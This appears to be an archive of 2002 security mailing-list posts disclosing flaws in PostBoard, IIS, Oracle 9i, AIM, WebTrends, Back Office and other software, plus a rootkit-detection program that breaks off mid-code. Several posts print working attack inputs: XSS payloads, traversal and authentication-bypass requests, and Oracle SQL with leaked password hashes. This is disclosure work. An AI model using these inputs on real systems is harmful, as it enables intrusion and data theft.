Multiple Vulnerabilities in PostBoard
Multiple Vulnerabilities in PostBoard
-
PostBoard is an add-on module for the PostNuke content
management system which implements a forum system.
The current version of PostBoard is 2.0.1 and can be
found at:
www.nukeaddon.com or ftp.dndresources.com.
I have discovered 3 problems with it. One of which was
originally discovered in another product by someone
else. These all exist in the 2.0/2.0.1 version.
Descriptions
1) bbcode IMG tag cross-site scripting
PostBoard uses the common bbcode markup system which
uses tags similar to html. The [IMG] tag will accept
any source including javascript. For example:
[IMG]javascript:alert('give me cookies');[/IMG]
The above javascript will execute on the victims
machine upon viewing a message that contains it.
Solution: Only allow URLs that start with 'http://'
2) Topic title cross-site scripting
When adding a new topic to a forum the user enters a
title for their new topic. The topic title can contain
any valid HTML code including script tags.
For example you can create a topic with the following
title and the script will execute when someone views
the list of topics in a forum:
scriptalert('give me cookies');/script
Solution: Do not allow unsafe HTML in topic titles.
There are functions available to do this in
the PostNuke API (i.e. pnVarPrepHTMLDisplay).
3) bbcode encoding problems
A recent advisory from Whitecell exposed
vulnerabilities in phpBB's handling of nested
bbcode tags which can lead to database
corruption and high CPU usage.
PostBoard appears to use the same code as phpBB for
encoding bbcode tags to HTML. It would be fair to
assume that PostBoard suffers from the same
problems as phpBB in this regard.
The original advisory by Whitecell can be found here:
http://online.securityfocus.com/archive/1/265798
A solution is provided in the above advisory.
Note: I have not tested this, but as the code in
PostBoard appears to have been pasted from phpBB it's
a fairly safe bet the problem exists.
Vendor Status
-
Vendor was notified of Whitecell advisory on the 7th
of April.
Vendor was notified of problems 1 2 on the 8th of
April.
A reply was received on 9th stating that fixes would
be available in the next version. No date was given.
I sent the vendor another email on the 13th of April
to follow up on progress as there had been a bug fix
release which did not contain fixes for any of the
above problems.
On the 14th of April someone left a message on the
PostBoard support forum which sounded like someone had
been attacked with one of these problems. He included
some detail as to how it was done. I notified the
vendor that I would be posting an advisory.
On the 16th of April another person reported that
they had had their forums redirected to another
site, probably via the same method (putting a
javascript redirect into a topic title). Still no
response from vendor.
Workarounds
---
The only pratical workaround for these problems is to
remove PostBoard from your site, or deny access to it
until a fix is released. Or try and patch it yourself.
Disclaimer
--
I do not work for, nor am I affiliated with any
security related organisation, especially any that
might have the same initials as my nickname/handle :)
Oh - and a big shout out to the NZ2600 crew, hi guys
(and gals)! ;)
Thanks!
gcsb.
__
Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax
http://taxes.yahoo.com/
Snort exploits
I didn't see it posted to these lists, but yesterday Dug Song quietly released a tool on the focus-ids list which totally blindsides Snort - http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains several fragroute scripts which blindside even the current Snort version in CVS, tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one line tcp_seg 1 new don't trigger any Snort alerts at all. :( :( Fragroute is a very powerful new tool. Has anyone found other attacks against Snort with it, or tried it against any other IDS for that matter? -=+ 0xCafeBabe +=- Hush provide the worlds most secure, easy to use online applications - which solution is right for you? HushMail Secure Email http://www.hushmail.com/ HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ Hush Business - security for your Business http://www.hush.com/ Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
[CERT-intexxia] AOLServer DB Proxy Daemon Format String Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SECURITY ADVISORYINTEXXIA(c) 30 01 2002 ID #1052-300102 TITLE : AOLServer DB Proxy Daemon Format String Vulnerability CREDITS : Guillaume Pelat found this vulnerability / INTEXXIA SYSTEM AFFECTED === AOLServer 3.4.2 AOLServer 3.4.1 AOLServer 3.4 AOLServer 3.3.1 AOLServer 3.2.1 AOLServer 3.2 AOLServer 3.1 AOLServer 3.0 DESCRIPTION === The Laboratory intexxia found a format string vulnerability in the AOL Server external database driver proxy daemon API that could lead to a privilege escalation. DETAILS === AOL Server provides an API to develop external database driver proxy daemons. Those daemons are linked to a library (libnspd.a). The Laboratory intexxia found a format string and a buffer overflow vulnerability in the 'Ns_PdLog' function of the library. Successful exploitation of the bug could allow an attacker to execute code and get access on the system. As a result, all the External Driver Proxy Daemons using the 'Ns_PdLog' function with the 'Error' or 'Notice' parameter are potentially vulnerable. SOLUTION This vulnerability has been fixed in the current version in CVS branch nsd_v3_r3_p0 (post-AOLserver 3.4.2) and can be used for any affected version. The patch used was created by intexxia and can be found in attachment. More information can be found at the following URL : http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/aolserver/aolserver/nspd/log.c.diff?r1=1.4r2=1.4.6.1 VENDOR STATUS = 14-03-2002 : This bulletin was sent to the developpement team. 19-03-2002 : The vendor confirmed the vulnerability and fixed it in the CVS branch nsd_v3_r3_p0 (post-AOLserver 3.4.2). LEGALS == AOL Server is a registered trademark. Intexxia provides this information as a public service and as is. Intexxia will not be held accountable for any damage or distress caused by the proper or improper usage of these materials. (c) intexxia 2002. This document is property of intexxia. Feel free to use and distribute this material as long as credit is given to intexxia and the author. CONTACT === CERT intexxia [EMAIL PROTECTED] INTEXXIA http://www.intexxia.com 171, av. Georges Clemenceau Standard : +33 1 55 69 49 10 92024 Nanterre Cedex - FranceFax : +33 1 55 69 78 80 -BEGIN PGP SIGNATURE- Version: PGPfreeware 7.0.3 for non-commercial use http://www.pgp.com iQA/AwUBPLwQr02N8BNyNDXLEQK7yQCfVh/7x6yBxWKEi5iwRDaHEHuilGUAoN+u 14o6inQET/8E4GdnfqgS6Jtj =YKem -END PGP SIGNATURE- SA1052-300102_aolserver-3.4.2-security-patched Description: Binary data SA1052-300102_aolserver-3.4.2-security-patched.sig Description: Binary data
Re: Remote buffer overflow in Webalizer
Here is a patch to fix the vulnerability (tested against webalizer-2.01-06). Franck Spybreak writes: Release : April 15 2002 Author : Spybreak ([EMAIL PROTECTED]) Software : Webalizer Version : 2.01-09, 2.01-06 URL : http://www.mrunix.net/webalizer/ Status : vendor contacted Problems : remote buffer overflow --- INTRO --- The Webalizer is a web server log file analysis program which produces usage statistics in HTML format for viewing with a browser. The results are presented in both columnar and graphical format, which facilitates interpretation. Webalizer 2.01-06 is a part of the Red Hat Linux 7.2 distribution, enabled by default and run daily by the cron daemon. --- PROBLEM --- The webalizer has the ability to perform reverse DNS lookups. This ability is disabled by default, but if enabled, an attacker with command over his own DNS service, has the ability to gain remote root acces to a machine, due to a remote buffer overflow in the reverse resolving code. Public key: http://spybreak.host.sk patch.webalizer Description: Binary data
An alternative method to check LKM backdoor/rootkit
Hello,
I can't find information about the method I find. If I am wrong, I am
sorry.
PRINCIPLE
LKM backdoor plays tricks to hide itself, including its running processes,
loadable kernel module and arbitary files. It changes the kernel behavior,
and hide things.
Because it hides things, it creates a fake view hiding things the installer
want to hide. Thus, differences between the real view and the fake view.
The differences are some of running processes, files are hidden, or say,
stealth.
METHODS
The discovery of LKM is important for the game. There are some ways to
do so, such as using LKM against LKM. There are two styles in all ways:
1. Find the differences between the two views;
2. Find the LKM directly;
LKM vs. LKM game involves the 2nd style.
THE ALTERNATIVE METHOD
Our alternative method uses the first style: to find the differences
between the fake view and the real view.
And we focus on filesystem view. A LKM backdoor is stealth, or it will
be discovered by juse scan the filesystem. So we check if there are
stealth files on filesystem.
We read the raw disk and traverse the filesystem on disk, bypass the
live filesystem, and create a real view of files on disk; then traverse
the live filesystem to get the fake view. Compare the two view, we can
find the differences. We will find the stealth files.
The actual code can do comparision when traversing the filesystem,
to save resouces.
PROOF OF CONCEPT
At the end, there is proof of concept code. The code is for linux and
ext2/ext3 filesystem. It has been tested on Mandrake and RedHat. Beware,
the code needs e2fsprogs 1.26 or above. A successful compilation on
RedHat invovles upgrades e2fsprogs-devel; on Mandrake, you need
libext2fs2-devel.
The code is used for proof of concept. It is not perfect. For example,
I don't add the check for files which points to INODE 0, I think leave
it there can give you some fun to play with debug(e2)fs, and prove it
works :-)
Thanks go to Zhang JiaJun for help me to test this out, and so I can
make it some smart when facing adore.
Thanks go to Theodore Ts'o 's good libext2fs library (and bad docs),
with which I can write simple code.
We have developed proof of concept code for solaris/ufs and
linux/reiserfs, but we still have some technical problems. We will
release them when we resolv them.
THE GAME WILL CONTINUE
The method utilizes raw disk interface, such as /dev/rdsk/c0t0d0s2
or /dev/hda1. LKM backdoor CAN intecept the interface, of course it
is rather complex and error prone.
CODE START HERE
/* stealth_file_checker.c
*
* Copyright (C) 2002 Wang Jian, Marsec System Inc.
*
* http://www.marsec.net/
*
* Concept and Programming:
*
* Wang Jian [EMAIL PROTECTED]
*
* Testing and Suggestion:
*
* Zhang JiaJun [EMAIL PROTECTED]
*
*
* No Warranty. This code is for educational use only, commercial use is
* prohibited.
*
* This small program demonstrates how to detect stealth files/dirs
* of lkm on linux ext2/ext3 filesystems.
*
* compile: gcc -o sfc main.c -lext2fs
*
* NOTE: You need e2fsprogs-1.26 or above to compile
*
* usage: run it without args to get hints
*
*/
#include stdlib.h
#include stdio.h
#include unistd.h
#include string.h
#include sys/types.h
#include sys/stat.h
#include dirent.h
#include ext2fs/ext2fs.h
ext2_ino_t root, cwd;
ext2_filsys fs;
ext2_ino_t string_to_inode(ext2_filsys fs, char *str)
{
ext2_ino_t ino;
int ret;
ret = ext2fs_namei(fs, root, cwd, str, ino);
if (ret) {
return 0;
}
return ino;
}
int list_dir_proc(ext2_ino_t dir,
intentry,
struct ext2_dir_entry *dirent,
intoffset,
intblocksize,
char *buf,
void *private)
{
char name[EXT2_NAME_LEN];
char tmp[EXT2_NAME_LEN + 256];
char tmppath[EXT2_NAME_LEN + 256];
intlen;
char *path;
struct stat stat_buf;
intflag;
char *prefix = (char *)private;
DIR* dp;
struct dirent *dirp;
len = ((dirent-name_len 0xFF) EXT2_NAME_LEN) ?
(dirent-name_len 0xFF) : EXT2_NAME_LEN;
strncpy(name, dirent-name, len);
name[len] = '\0';
if(entry == DIRENT_DELETED_FILE) {
return 0;
}
ext2fs_get_pathname(fs, dir, 0, path);
sprintf(tmp, %s%s/%s, prefix, path, name);
sprintf(tmppath, %s%s, prefix, path);
/* chdir() then readdir() is for adore LKM, anyway it works
* for other LKM.
*/
chdir(tmppath);
if( (dp = opendir(.)) == NULL ) {
printf(open dir %s error\n, tmppath);
exit(1);
}
flag=1;
while ((dirp = readdir(dp)) != NULL) {
if (strcmp(dirp-d_name, name) == 0) {
flag=0;
break;
}
}
closedir(dp);
Re: Ability to read buddy list of AIM users
any OS although I havent tried linux and Mac yet. Under Linux (or any Unix), all AIM clients I've tried (AOL AIM for Linux, Everybuddy, GAIM) put your buddy list into your home directory, so unless you have world-readable home directories this should not be a problem. -- -- Eugene Medynskiy You can't fight in here, this is the War Room!
Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Summary: Microsoft's IIS 5.0 web server is shipped with a set of sample files to demonstrate different features of the ASP language. One of these sample files allows a remote user to view the source of any file in the web root with the extension .asp, .inc, .htm, or .html. The IISSamples virtual directory should not be left on production servers in the first place, but until now there were no serious[1] vulnerabilities found in those sample scripts. Microsoft was _not_ contacted about this, they can read the lists like everyone else. This is an issue that can be fixed by proper system administration. Solution: Remove the /IISSamples virtual directory using the Internet Services Manager. If for some reason this is not possible, removing the following ASP script will fix the problem: This path assumes that you installed IIS in c:\inetpub c:\inetpub\iissamples\sdk\asp\docs\CodeBrws.asp Details: The IIS developers actually put some thought into securing this sample script. Unfortunately for them and their user base, they didn't take into account the Unicode character set when checking the path passed to the script. The function fValidPath in CodeBrws.asp has the following comment placed above it: REM ** REM intended behavior: REM allow access to only .asp, .htm, .html, .inc files REM in some directory starting from /IISSAMPLES REM and without .. in the path REM ** The fValidPath function first checks to see if the base directory starts with /IISSAMPLES, then verifies that the last characters of the request are one of the allowed extensions, and finally checks to see if the .. sequence is anywhere in the string. The problem is that .. can be represented a number of other ways using the Unicode character set. For instance, the sequence %c0%ae%c0%ae will be decoded as two periods by IIS, but will not be caught by the InStr(1,strPath,..,1) code in the ASP script. So to create a request which passes the input filters but retrieves the source of default.asp... /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp [1] While all versions of IIS previous to 5.0 had significant problems with the bundled sample scripts, 5.0 has only had a couple information gathering issues to date. Due to the lowered risk, many administrators have left the iissamples virtual directory mapped on their production servers.
Mailman/Pipermail private mailing list/local user vulnerability
There is a vulnerability in Pipermail (mailing list archiving software distributed with and integrated with Mailman), that affects you if you have local users on the machine. If you have (a) private Mailman mailing lists and (b) user logins on the same machine, any local user can read the archives of those private mailing lists. The Mailmain people have apparently declined to fix this bug. Therefore I wanted to report it here so people are at the very least aware. Attached is my bug report and their response. -hpa Bugs item #474616, was opened at 2001-10-24 16:35 You can respond by visiting: http://sourceforge.net/tracker/?func=detailatid=100103aid=474616group_id=103 Category: Pipermail Group: None Status: Closed Resolution: Wont Fix Priority: 8 Submitted By: H. Peter Anvin (hpa) Assigned to: Nobody/Anonymous (nobody) Summary: SECURITY: Pipermail permissions problem Initial Comment: $mailman_root/archive/private is o+x in the default installation. This allows anyone with local access to the machine to read the archives of private mailing lists, as long as they know the (trivial) structure of the files beneath this directory. I have verified that changing this directory to o-x causes *all* pipermail pages to become inaccessible, so that does not resolve the problem. There presumably needs to be a setgid program involved which can verify that the user is authenticated and give access to the archives if appropriate; then that directory can be made o-x. -- Comment By: Barry Warsaw (bwarsaw) Date: 2002-04-11 18:40 Message: Logged In: YES user_id=12800 I'm not inclined to fix this, since this arrangement is crucial to the web security of private archives. Since Mailman is usually run on mail and/or web servers that have very limited access anyway, I don't consider this an important vulnerability. -- You can respond by visiting: http://sourceforge.net/tracker/?func=detailatid=100103aid=474616group_id=103
Re: ansi outer join syntax in Oracle allows access to any data
Hi Charles The point is that I can see the dba_users view owned by SYS as a user with only CREATE SESSION privilege. This is only possible because of the bug in the ANSI outer join syntax. This bug allows access to any table without any granted privileges to any user! The example you show below doesn't show which user you are logged in as or what privileges that user has. I assume its a user that is either a DBA or has select privileges on the catalog or SELECT ANY TABLE or select explicitly on that view. Try the exact SQL i showed and check for yourself that it doesn't work in 8.1.6. but will work in 9.0.1 cheers Pete In article [EMAIL PROTECTED], Charles J Wertz [EMAIL PROTECTED] writes You don't need 9i or ansi syntax. Connected to: Oracle8i Enterprise Edition Release 8.1.6.0.0 - Production With the Partitioning option JServer Release 8.1.6.0.0 - Production SQL set serveroutput on size 100 SQL sta users SQL select username, user_id, password from sys.dba_users 2 / .. USERNAME USER_ID PASSWORD -- -- -- GABRMJ21 206 A08F7F24DCD35845 ABDUSM62 204 25F6BFBE9888CB23 CLARVL18 205 E45523E8504F938E SYMEJM94 195 BF1A81C928566EEE COSAL75 118 4EDA8C950487B16F CONNTS37 117 B3EB3D464F64E317 ANASD51 111 AC5DE6711420E91E FEDEJB07 224 5111DAC3006F6D81 DELLJM28 223 FC707A68849F1C3F CARTKR33 222 2002A82D0DB2DB19 BRANLD12 221 9857842415FF35B5 ... I haven't checked this out. I take it these are encrypted passwords ?? cjw At 04:24 PM 4/16/2002 +0100, Pete Finnigan wrote: Hi all I thought this list may be interested in this issue, apologies if its known here already. Oracle 9i includes the new ANSI outer join syntax. Oracle still supports the old syntax but in the new syntax there is a serious security issue that allows any user to view any data. here is an example: SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2 (c) Copyright 2001 Oracle Corporation. All rights reserved. Connected to: Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production With the Partitioning option JServer Release 9.0.1.1.1 - Production SQL connect / as sysdba Connected. SQL CREATE USER us1 IDENTIFIED BY us11; User created. SQL Grant Create Session to us1; Grant succeeded. SQL connect us1/us11; Connected. SQL select a.username, a.password 2 from sys.dba_users a left outer join sys.dba_users b on 3 b.username = a.username 4 ; USERNAME PASSWORD -- -- SYSD4C5016086B2DC6A SYSTEM D4DF7931AB130E37 DBSNMP E066D214D5421CCC AURORA$JIS$UTILITY$INVALID_ENCRYPTED_PASSWORD OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD SCOTT F894844C34402B67 US1491AB9AB94D8A9EF OUTLN 4A3BA55E08595C81 ORDSYS 7EFA02EC7EA6B86F OLAPSVRAF52CFD036E8F425 USERNAME PASSWORD -- -- OLAPSYS3FB8EF9DB538647C ORDPLUGINS 88A2B2C183431F00 MDSYS 72979A94BAD2AF80 CTXSYS 71E687F036AD56E5 WKSYS 69ED49EE1851900D OLAPDBA1AF71599EDACFB00 QS_CBADM 7C632AFB71F8D305 QS_ADM 991CDDAD5C5C32CA QS 8B09C6075BDF2DC4 QS_WS 24ACF617DD7D8F2F HR 6399F3B38EDF3288 USERNAME PASSWORD -- -- OE 9C30855E7E0CB02D PM 72E382A52E89575A SH 9793B3777CD3BD1A QS_ES E6A6FA4BB042E3C2 QS_OS FF09F3EB14AE5C26 RMAN E7B5D92911C831E1 QS_CB CF9CFACF5AE24964 QS_CS 91A00922D8C0F146 30 rows selected. SQL This shows that a user with the barest of privileges, i.e. CREATE SESSION can actually see data in the data dictionary that should not be seen. In this example we can select the list of usernames and their hashes. I wanted to bring this issue to the security community as its doing the rounds on the oracle server newsgroup. Oracle are already aware of this as there is a bug to
AIM's 'Direct Connection' feature could lead to arbitrary file creation
AIM's 'Direct Connection' feature could lead to arbitrary file creation -- - Author: Noah Johnson ( [EMAIL PROTECTED] ) Affected versions: All versions of AOL Instant Messenger (up to 4.8 beta) on all platforms of Windows (as far as I can tell). Preface: AOL may have patched their servers to prevent the wave of DoS attacks recently discovered, but this bug - related to the 'Direct Connection' feature - cannot be filtered through the server itself, and therefore requires a new realease to be patched. Because direct connections (almost always) require user approval, the severity of this bug is somewhat smaller than others recently discovered, however exploitation is fairly simple and could result in anywhere from arbitrary script execution to overwriting of critical files, and so I think it's still worthy of being noted and fixed soon. Summary: The problem arises in AIM's handling of embedded objects during direct connections with other users. These 'direct connections' supposedly make it easier for users to share multimedia with each other during conversations. When a direct connection is to be made, the initiating side acts as a server - on port 4443 - for the recipient's client to connect to (if the request is accepted, of course). After this connection is made, all activity between the two users is passed through it, relieving the AIM server of its job for the time being. When a user sends a picture or a sound to his buddy, an IMG tag is appropriately inserted into the conversation source, while that file's data lies in a separate DATA tag immediately proceeding the HTML (see below). The client responds to this IMG tag either by displaying the picture in the conversation or by displaying an icon of the MIME/file-type that has been sent. Along with the standard parameters of this IMG tag (HEIGHT, WIDTH, DATASIZE, ID, etc...), the client also specifies the name and path of the original file that was sent. This information is included in the SRC parameter, and is the one of importance here. The client uses this information in a few ways - including the default filename suggested when the user opts to save whatever the hell was sent. So, why does anyone care? One last nifty feature I forgot to mention... When the client parses the file and recognizes it as a RIFF/WAVE type, it will play that file instantly via the 'SndPlaySoundEx' API function. Instead of playing the buffer directly from memory however, it is instead downloaded into the Windows 'temp' directory and read from there. But for some odd reason, THE ORIGINAL FILENAME IS USED FOR THIS TEMPORARY FILE! (Can you see where this is heading??) With very trivial parsing of this SRC parameter, AIM is left wide open to the old (..\..) directory traversal attack. So now we can choose ANY path on our buddy's system to save our file to simply by appropriately sculpting the SRC information. Here's an example of what might be sent from the direct connection: ... Data Headers (explained later) HTMLBODYHey, what's up?IMG SRC=\..\system\johnny.important_file HEIGHT=0 WIDTH=0 DATASIZE=50 ID=1/BODY/HTMLBINARYDATA ID=1***WAVE FILE DATA HERE***/DATA/BINARY ... Assuming that the temp directory on Johnny's computer is [c:\windows\temp], this would write/overwrite whatever file was thus specified. No obvious signs of this would be noted, as the WAVE icon would never show up in Johnny's box (notice the HEIGHT and WIDTH values). Fooling the Client: As noted earlier, AIM only saves this (semi-) temporary file when it identifies it as valid RIFF/WAVE data and tries to play it. So what good is this if we can only write WAVE files? (HOLY SHIT! YOU MEAN WE CAN OVERWRITE THEIR AIM SOUNDS?!) Unfortunately for Johnny, the client only looks at the first 12 bytes before concluding it is indeed a valid sound file. These bytes ideally look like this (see wave file specifications): Offset Data 0,1,2,3 ASCII 'RIFF' 4,5,6,7 DWORD Wave File Size ( - can be anything, we don't care; neither does the client. ) 8,9,A,B ASCII 'WAVE' Keeeping this as a base, we can then sculpt any file we want (sample exploits next). As long as these 12 bytes are respected (actually, only the ASCII parts of them really matter), the file is saved. The fact that the header is already determined severely limits the danger of this bug (we cannot, for example, create an executable file). There are a few ways around this... Exploiting: Besides the potential of overwriting files, there are plenty of file types that can be bullshitted in the first 12 bytes without losing functionality of the entire thing (think scripts,
[SNS Advisory No.51] Compaq Tru64 UNIX libc Buffer Overflow Vulnerability
-- SNS Advisory No.51 Compaq Tru64 UNIX libc Buffer Overflow Vulnerability Problem first discovered: Sun, 18 Nov 2001 Published: Thu, 17 Apr 2002 -- Overview: - Libc included with Compaq Tru64 UNIX contains a buffer overflow vulnerability, which could allow local attackers to elevate privileges. Problem Description: Libc included with Compaq Tru64 UNIX is vulnerable to a buffer overflow due to a flaw in the handling of the environment variables LANG and LOCPATH. Local attackers could elevate privileges by using a SUID/SGID executable file that links to the vulnerable libc. Affected Versions: -- Compaq Tru64 UNIX V4.0F Compaq Tru64 UNIX V5.0 Compaq Tru64 UNIX V5.1 Compaq Tru64 UNIX V5.1A Solution: - This problem can be eliminated by applying an appropriate patch to your Tru64 UNIX version based on the information in the following URL: Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities in Tru64,Unix,CDE,NFS,and NIS: http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml Discovered by: -- Noboru Yoshinaga (LAC) [EMAIL PROTECTED] Disclaimer: --- All information in these advisories are subject to change without any advanced notices neither mutual consensus, and each of them is released as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences caused by applying those information.
[SNS Advisory No.50] Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability
-- SNS Advisory No.50 Compaq Tru64 UNIX dtprintinfo -session Buffer Overflow Vulnerability Problem first discovered: Wed, 10 Oct 2001 Published: Thu, 17 Apr 2002 -- Overview: - dtprintinfo included with Compaq Tru64 UNIX contains a buffer overflow vulnerability, which could potentially allow local attackers to elevate privileges. Problem Description: The /usr/dt/bin/dtprintinfo included with Compaq Tru64 UNIX is a program for opening the CDE Print Manager window. This program is installed as SUID root. In dtprintinfo it is possible to restore a client to the original desktop state by loading the session file using the -session option. A buffer overflow will occur in dtprintinfo when an unusually long string of characters is used in session filenames. This will result in the possibility for the local attacker to execute arbitrary code as root. Affected Versions: -- Compaq Tru64 UNIX V4.0F Compaq Tru64 UNIX V5.0 Compaq Tru64 UNIX V5.1 Compaq Tru64 UNIX V5.1A Solution: - This problem can be eliminated by applying an appropriate patch to your Tru64 UNIX version based on the information in the following URL: Compaq SECURITY BULLETIN (SSRT-541) Potential Security Vulnerabilities in Tru64,Unix,CDE,NFS,and NIS: http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml Discovered by: -- Noboru Yoshinaga [EMAIL PROTECTED] Disclaimer: --- All information in these advisories are subject to change without any advanced notices neither mutual consensus, and each of them is released as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences caused by applying those information.
Re: ansi outer join syntax in Oracle allows access to any data
Tested as a user with some privs (but not DBA or SELECT ANY TABLE) as below SQL select username, user_id, password from sys.dba_users; select username, user_id, password from sys.dba_users * ERROR at line 1: ORA-00942: table or view does not exist SQL select * from v$version 2 ; BANNER Oracle8i Enterprise Edition Release 8.1.6.3.0 - Production PL/SQL Release 8.1.6.3.0 - Production CORE8.1.6.0.0 Production TNS for Solaris: Version 8.1.6.3.0 - Production NLSRTL Version 3.4.0.0.0 - Production SQL Not sure if ANSI syntax is required (not testable in 8.1.6) and I don't have a 9i DB to test it on. Greg. - Begin Forwarded Message - The point is that I can see the dba_users view owned by SYS as a user with only CREATE SESSION privilege. This is only possible because of the bug in the ANSI outer join syntax. This bug allows access to any table without any granted privileges to any user! The example you show below doesn't show which user you are logged in as or what privileges that user has. I assume its a user that is either a DBA or has select privileges on the catalog or SELECT ANY TABLE or select explicitly on that view. Try the exact SQL i showed and check for yourself that it doesn't work in 8.1.6. but will work in 9.0.1 cheers Pete
Webtrends Reporting Center Buffer Overflow (#NISR17042002C)
NGSSoftware Insight Security Research Advisory Name:WebTrends Reporting Center 4.0d Systems Affected: WinNT, Win2K, XP Severity: High Risk Category: Remote System Buffer Overrun Vendor URL: http://www.webtrends.com Author: Mark Litchfield ([EMAIL PROTECTED]) Advisory URL: http://www.ngssoftware.com/advisories/wtr.txt Date: 17th April 2002 Advisory number: #NISR17042002C Issue: Attackers can run arbitrary code, remotely, as SYSTEM. Description *** WebTrends Reporting Center provides fast and comprehensive analysis of web site activity to multiple decision-makers throughout an organization via a browser-based interface. WebTrends Reporting Center is, according to their own website, NetIQ's flagship web analytics reporting product, recently receiving an Editor's Choice Award from Network Computing Magazine (Feb 6, 2002). Details *** Buffer Overrun: In order for an attacker to exploit this vulnerability requires they must first undergo user authentication at http://targetmachine:1099(default listening port)/remote_login.pl. However, Webtrends Reporting Server allows anonymous logins for reports that are made available for public viewing. After a successful login, making a GET request to http://targetmachine:1099/reports/(Long Char String) will cause an access violation occurs in WTRS_UI.EXE (WTX_REMOTE.DLL) overwriting the saved return address on the stack. The Reporting Server process, WTRS_UI.EXE, is by default started as a system service along with WTRS.EXE, therefore any arbitary code would execute with system privileges. Path Disclosure - By making a simple GET request for http://targetmachine/get_od_toc.pl?Profile= (no authentication required) an error message is returned - Unable to open content file path=C:/PROGRA~1/WEBTRE~1/wtm_wtx/ Fix Information *** NGSSoftware alerted Webtrends to the buffer overrun issue on 31st March 2002 and future versions will be fixed. There is still some question as to whether a patch will be produced for earlier versions. In the meantime NGSSoftware recommend preventing anonymous access to the Reports server. NGSSoftware recommend that where possible, the service be run as a low privileged account as opposed to starting it as a system service. A check for these issues have been added to Typhon II, NGSSoftware's vulnerability assessment scanner, of which more information is available from the NGSSite : http://www.ngssoftware.com/. Further Information *** For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf
Back Office Web Administrator Authentication Bypass (#NISR17042002A)
NGSSoftware Insight Security Research Advisory Name:Back Office Web Administration Authentication Bypass Systems Affected: Microsoft's Back Office Web Administrator 4.0, 4.5 Severity: Medium/High Vendor URL: http://www.microsoft.com Author: David Litchfield ([EMAIL PROTECTED]) Date: 17th April 2002 Advisory number: #NISR17042002A Advisory URL: http://www.ngssoftware.com/advisories/boa.txt Issue: Attackers can bypass the logon page and access the Back Office Web Administrator Description *** With the Microsoft Back Office suite of products comes a web based administration ASP based application that runs on IIS. Normally, to use the administration pages a user must authenticate but NGSSoftware have discovered that it is trivial to bypass this. Details *** Each of the Back Office Web Administrator ASP pages checks to see if the user has been authenticated but does this with the following snippet of code If Request.ServerVariables(auth_type) = Then Response.Status = 401 ACCESS DENIED Response.End End If This is the only authorization/authentication performed. As such it's trivial to bypass: GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1 Host: hostname Authorization: Basic [enter] [enter] No credentials are required as, technically the auth_type envariable has been set, regardless of whether a user name or password have been supplied. Risk and Mitigating Factors *** By default the Back Office Web Administrator is limited to the loopback address (127.0.0.1) which means that it can't be accessed remotely. However, it is not uncommon to change this to allow for remote administration; tying the Administrator to the loopback address makes it somewhat useless. Basic authentication also needs to be enabled which, again, is not uncommon. Fix Information *** For those that match this criteria they are strongly urged to obtain the the patch from Microsoft. Please see http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838; for more details. A check for this issue has also been added to Typhon II, NGSSoftware's vulnerabilty assessment scanner. For more information about Typhon, please see the NGSSite @ http://www.ngssoftware.com/.
Ammendum: A crash course with Linux Kernel 2.4.x, IP ID values RFC 791
This was edited out by mistake: --- Thanks: I would like to thank Toby Miller for the TCP trace and help with verifying findings. --- Thanks -- Ofir Arkin Managing Security Architect @stake, Limited. http://www.atstake.com email: [EMAIL PROTECTED]
Buffer Overrun in Talentsoft's Web+ (3) (#NISR17042002B)
NGSSoftware Insight Security Research Advisory Name:Web+ Cookie Buffer Overflow Systems Affected: IIS and Web+ 4.6/5.0 on Windows NT/2000 Severity: High Risk Vendor URL: http://www.talentsoft.com Author: David Litchfield ([EMAIL PROTECTED]) Date: 17th April 2002 Advisory number: #NISR17042002B Advisory URL: http://www.ngssoftware.com/advisories/webplus3.txt Issue: Attackers can run arbitrary code as SYSTEM on the web server. Description *** Talentsoft's Web+ v5.0 is a powerful and comprehensive development environment for use in creating web-based client/server applications. Details By requesting a WML file from a web server and supplying an overly long cookie, an internal buffer is overflowed, overwriting a saved return address on the stack. On procedure return control over the web server process' execution can be gained. If the server is running IIS 4 and using the Web+ ISAPI filter, then inetinfo.exe is the process captured. As this runs as SYSTEM, any code supplied by an attacker will run uninhibited. If IIS 5.0 then the process is dllhost.exe which runs in the context of the IWAM_* account. As this has limited privileges the risk is reduced. If the Web+ environment is set up using the webplus CGI executable, webplus.exe, on either server, then, again, the risk is reduced. Fix Information ** Talentsoft have created a patch for this problem. Please see http://www.talentsoft.com/download/download.en.wml for more details. NGSSoftware urges all Web+ customers to apply this as soon as is possible. A check for this issue has been added Typhon II, NGSSoftware's vulnerability assessment scanner, of which more information is available from the NGSSite @ http://www.ngssoftware.com/. Further Information *** For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf
KPMG-2002011: Windows 2000 microsoft-ds Denial of Service
